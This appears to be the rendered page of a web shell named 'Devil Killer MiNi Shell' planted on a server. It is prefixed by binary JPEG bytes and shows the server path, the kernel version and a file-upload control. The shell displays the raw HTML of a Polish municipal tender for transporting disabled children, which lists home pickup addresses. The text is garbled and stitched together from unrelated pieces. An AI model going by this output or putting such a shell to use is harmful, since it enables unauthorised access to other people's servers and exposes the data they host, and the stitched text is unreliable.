JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240927/0051982001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zorganizowany, codzienny dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2024/2025” – III postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sobótka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935112</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sobótka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-050</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@sobotka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.sobotka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zorganizowany, codzienny dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2024/2025” – III postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96e3a331-a9e7-4c08-971c-6d5beeed7d11</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00519820</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00009448/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 „Zorganizowany, codzienny dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2024/2025” – III postępowanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-96e3a331-a9e7-4c08-971c-6d5beeed7d11 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim za pośrednictwem<br/>platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/gmina_sobotka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gmina_sobotka<br/>3. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art.<br/>125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w<br/>postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. 6. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gmina_sobotka<br/>3. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art.<br/>125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w<br/>postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. 6. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIiGK.271.18.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Zorganizowany, codzienny dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2024/2025” – w Wierzbicach, Kątach Wrocławskich i Rękowie, polegający na przewozie dzieci na trasie: miejsce zamieszkania dziecka – szkoła/przedszkole/ośrodek – miejsce zamieszkania dziecka, pod opieką osoby dorosłej, na podstawie art. 31 ust.2, art. 32 ust. 6, art. 36 ust.17, art.127 ustawy Prawo oświatowe (t.j. Dz.U. z 2024 r.,poz. 737 z późn. zm.) w okresie od dnia podpisania umowy, nie szybciej niż od dnia 28.10.2024 r. – 27.06.2025 r.<br/><br/>Opis zadania<br/>DOWÓZ DO SZKOŁY – 8 dzieci:<br/> a) 1 dziecko do Zespołu Szkół Specjalnych im. św. ks. Zygmunta Gorazdowskiego w Wierzbicach: Wierzbice, ul. Lipowa 44, 55-040 Kobierzyce;<br/>b) 7 dzieci do Specjalnego Ośrodka Szkolno – Wychowawczego w Kątach Wrocławskich, <br/>ul. Drzymały 13, 55 – 080 Kąty Wrocławskie;<br/><br/>DOWÓZ PORANNY – 8 osób<br/>L.p.	Godzina	Przystanek	Liczba dzieci	Odległość (km)<br/>1	6:25	Sobótka ul. Zmorskiego 19	1	0<br/>2	6:35	Sobótka ul. Dworcowa 11	1	3,7<br/>3	6:40	Sobótka ul. św. Jakuba 32/12	1	1,2<br/>4	6:45	Sobótka ul. Mickiewicza 23 A	1	0,55<br/>5	6:50	Sobótka ul. Ciasna 27	1	0,65<br/>6	7:00	Kunów ul. Nasławicka 19	1	4,8<br/>7	7:10	Rogów ul. Wrocławska 43	1	5,2<br/>8	7:20	Olbrachtowice ul. Wronia 7	1	6,8<br/>9	7:30	Wierzbice	1 dziecko wysiada	5<br/>10	7:50	Kąty Wrocławskie	7 dzieci wysiada	14<br/>RAZEM	41,90 km<br/>Przewidywana liczba kilometrów 147 dni x 41,90 km= 6159,30 km<br/><br/>ODWÓZ ZE SZKOŁY – 9 dzieci:<br/> a) 1 dziecko z Zespołu Szkół Specjalnych im. św. ks. Zygmunta Gorazdowskiego w Wierzbicach: Wierzbice, ul. Lipowa 44, 55-040 Kobierzyce;<br/>b) 7 dzieci ze Specjalnego Ośrodka Szkolno –Wychowawczego w Kątach Wrocławskich, <br/>ul. Drzymały 13, 55 – 080 Kąty Wrocławskie;<br/>c) 1 dziecko z Niepublicznej Szkoły Podstawowej z Oddziałami Integracyjnymi w Rękowie: Ręków, ul. Nasławicka 21, 55-050 Sobótka<br/><br/>ODWÓZ PO ZAJĘCIACH – 9 osób<br/>L.p.	Godzina	Przystanek	Liczba dzieci	Odległość (km)<br/>1	14:10	Kąty Wrocławskie - szkoła	7 dzieci wsiada	0<br/>2	14:30	Wierzbice - szkoła	1 dziecko wsiada	14<br/>3	14.40	Ręków - szkoła	1 dziecko wysiada, 1 dziecko wsiada	6,5<br/>4	14:50	Kunów ul. Nasławicka 19	1	5,4<br/>5	15:00	Rogów ul. Wrocławska 43	1 5,2<br/>6	15:10	Sobótka ul. św. Jakuba 32/12	1	4,1<br/>7	15:15	Sobótka ul. Mickiewicza 23A	1	0,55<br/>8	15:20	Sobótka ul. Sienkiewicza 34	1	0,60<br/>9	15:25	Sobótka, ul. Ciasna 27	1	1,1<br/>10	15:30	Sobótka ul. Dworcowa 11	1	1<br/>11	15:40	Sobótka ul. Zmorskiego 19	1 3,7<br/>RAZEM	42,15 km<br/>Przewidywana liczba kilometrów 147 dni x 42,15 km= 6196,05 km<br/><br/>Łącznie dla zadania: 6159,30 km + 6196,05 km = 12355,35 km<br/><br/>Odległości pomiędzy poszczególnymi odcinkami trasy obliczono za pomocą Google Maps.<br/>Razem dla przedmiotu zamówienia:<br/>Zadanie – 12355,35 km, tj. 84,05 km dziennie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-10-28 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">:Zamawiający<br/>przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt 7 w zw. z art. 305 pkt 1 p.z.p. oraz w zw. z art. 455 ust. 1 p.z.p.<br/>polegających na powtórzeniu podobnych usług jakie występują w zamówieniu podstawowym w wysokości do 5% pierwotnej wartości<br/>zamówienia.<br/>Zakres możliwych do udzielenia zamówień uzupełniających może polegać na powtórzeniu tego samego rodzaju zamówień,<br/>zgodnych z przedmiotem zamówienia podstawowego, w szczególności:<br/>a) świadczenie usług poza okresem 28.10.2024 r.- 27.06.2025 r.<br/>b) zwiększenie liczby tras objętych usługami,<br/>c) zmniejszenie liczby tras objętych usługami,<br/>d) zwiększenie liczby dzieci do przewozu,<br/>e) zmniejszenie liczby dzieci do przewozu.<br/>Zamówienie powinno polegać na powtórzeniu podobnych usług, i powinno być zgodne z jego przedmiotem.<br/>Zamawiający nie przewiduje zmniejszenia zakresu rzeczowego podstawowego zamówienia, jedynie jego zwiększenie do wartości<br/>procentowej wskazanej powyżej, jeśli zajdzie uzasadniona konieczność.<br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego zamówienia publicznego<br/>Warunki udzielenia zamówienia z art. 455 ustawy p.z.p.:<br/>Przewiduje się następujące możliwości wprowadzenia zmian do umowy:<br/>1) zwiększenie lub zmniejszenie liczby dzieci uprawnionych do przewozu;<br/>2) konieczność zmiany pojazdu/pojazdów do przewozu;<br/>3) konieczność objęcia przewozem dzieci do szkoły/przedszkola/ośrodka, nie uwzględnionej dotychczas w organizacji przewozu, do<br/>której uczęszczają uczniowie uprawnieni do dowozu;<br/>4) w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia<br/>wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia tj. części<br/>wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie dokonano;<br/>5) w sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter nieistotnych, tj. nie<br/>odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby<br/>dopuszczenie innej oferty niż ta, która została dopuszczona.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriach:<br/>1) Cena brutto (C) – waga kryterium 60%;<br/>2) Czas podstawienia pojazdu zastępczego w przypadku awarii (P) - waga kryterium 40%.<br/>Ad. 1 Cena (C) – waga 60%<br/>Kryterium „Cena brutto” będzie rozpatrywana na podstawie ceny brutto w danej części zamówienia, podanej przez Wykonawcę w<br/>Formularzu oferty.<br/>Zamawiający ofercie o najniższej cenie spośród ofert ocenianych przyzna 60 punktów a każdej następnej zostanie<br/>przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>najniższa cena brutto*<br/>C = ----------------------------------------- x 100 pkt x 60%<br/>cena brutto ocenianej oferty<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Ad. 2 Czas podstawienia pojazdu zastępczego w przypadku awarii (P) – waga 40%<br/>W przypadku kryterium „Czas podstawienia pojazdów zastępczego w przypadku awarii” (P), sposób oceny nastąpi wg następujących<br/>zasad:<br/>Oferta z czasem podstawienia pojazdu zastępczego w razie awarii w czasie 30 minut otrzyma – 40 punktów.<br/>Punkty przyznawane w kryterium będą naliczane według następujących zasad:<br/>Podstawienie pojazdu zastępczego w razie awarii w czasie:<br/>Ogłoszenie nr 2024/BZP 00451585/01 z dnia 2024-08-09<br/>2024-08-09 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>a) powyżej 60 minut – 0 pkt.<br/>b) od 30 min do 60 min – 20 pkt.<br/>c) do 30 min – 40 pkt.<br/>Wskazane powyżej informacje w zakresie kryterium „Czas podstawienia pojazdu zastępczego w przypadku awarii” (P), należy<br/>zamieścić w odpowiedniej pozycji formularza ofertowego, stanowiącego załącznik nr 1 do SWZ.<br/>Liczba punktów określona zostanie na podstawie wzoru:<br/>ilość pkt badanej oferty = ilość pkt za kryterium C + ilość za kryterium P.<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu<br/>i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli<br/>zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w<br/>terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w przypadku awarii (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale X SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub 